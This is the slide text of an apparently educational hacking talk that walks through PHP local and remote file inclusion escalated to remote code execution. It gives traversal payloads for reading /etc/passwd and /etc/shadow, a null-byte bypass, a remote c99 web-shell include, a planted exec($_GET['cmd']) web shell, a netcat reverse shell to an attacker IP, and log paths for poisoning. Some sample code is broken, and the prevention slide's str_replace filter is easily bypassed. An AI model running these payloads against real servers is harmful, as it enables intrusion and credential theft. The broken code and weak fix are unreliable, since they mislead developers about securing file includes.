How to perform LFI and RFI attacks

1. Journey From LFI to RCE
-G.Manideep
@mani0x00

2. #Who am I?
Member at #nullhyd
Pursuing B.tech 4th year
Jack of all,Master of none!
Interested in Information Security

3. #What is I’m gonna talk?
LFI
RFI 10%
RCE
And …. Demo’s ;) − 90%

4. #What you need to know?
Cd .. (how to change directories :p )
Netcat
Little knowledge on Php
Ssh
Let’s Go!!!

5. #Disclaimer

6. #Local File Inclusion
Local File Inclusion is the process of including files on
a server through the web browser. This vulnerability
occurs when a page include is not properly sanitized,
and allows directory traversal characters to be injected.
<?php
$page=$_GET[“page”];
include($_GET[“$page”]);  Vulnerable !!
?>

7. #Local File Inclusion
What if the attacker assigns page to be
"../../../../etc/passwd". It causes the attacker to read a
content from /etc/passwd.
Vulnerable Function’s leads to LFI
-include()
-include_once()
-require()
-require_once()
-fopen()

8. #Finding Vul Functions
Make Mistakes! :D

9. #Local File Inclusion
<?php
if($_GET[“page”]) {
$file = preg_replace(‘/x00.*/’, “” ,$file);
include($file);
}
?>
o In This Case we may use terminator’s(%00) to execute LFI
Eg: ?page=../../../../../../../../var/log/auth.log%00

10. #Local File Inclusion
Some Directories to verify LFI.
 etc/passwd
 /etc/shadow
 /etc/group
 /etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
Database Configuration
i.e: config.inc.php

11. #Remote File Inclusion
RFI stands for Remote File Inclusion that allows the attacker to
upload a custom coded/malicious file on a website or server. The
vulnerability exploit the poor validation checks in websites and
can eventually lead to code execution on server or code execution
on website (XSS attack using JavaScript).
<?php
$file ="http://Somesite/c99.php?"; //$_GET['page'];
include($file .".php"); //include (http://Somesite/C99.php?.php)
?>

12. #Prevention
Do not permit appending file paths directly.
Use str_replace(‘../’, ‘ ’, $_GET[‘file’]);
If you definitely need dynamic path concatenation,
ensure you only accept required characters such as "a-Z
0-9" and do not allow ".." or "/" or "%00" (null byte) or
any other similar unexpected characters.

13. #Demo On LFI&RFI

14. #Remember
Finding o Exploitation

15. #Exploitation
Verifying RCE with phpinfo()
Verifying the hack by ping our machine.
Getting a Shell

16. #Remote Code Execution
The Process of executing own script’s on the Web
Server Remotely is called “Remote Code Execution”.

17. #Verifying the Hack
Let’s Ping ourself!

18. #Shell Time
Include a malicious php code
<?php exec($_GET[‘cmd’]); ?>
Let’s make a GET request
…..&cmd=nc <ip> <port> -e /bin/bash

19. #Log Locations
../apache/logs/error.log
../apache/logs/access.log
../etc/httpd/logs/acces_log
../usr/local/apache/logs/access. Log
../var/log/apache2/error_log
../var/www/logs/error_log

20. #Thanks!